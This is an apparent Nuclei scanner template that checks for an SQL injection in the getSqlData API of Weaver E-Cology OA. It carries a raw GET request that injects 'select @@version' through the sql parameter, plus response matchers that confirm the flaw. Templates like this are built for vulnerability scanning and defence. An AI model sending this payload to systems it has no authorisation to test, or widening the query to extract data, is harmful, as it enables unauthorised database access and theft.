id: getSqlData_Sql
info:
  name: 泛微OA E-Cology getSqlData SQL注入漏洞
  author: weehhd
  severity: high
  description: https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - api_status
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
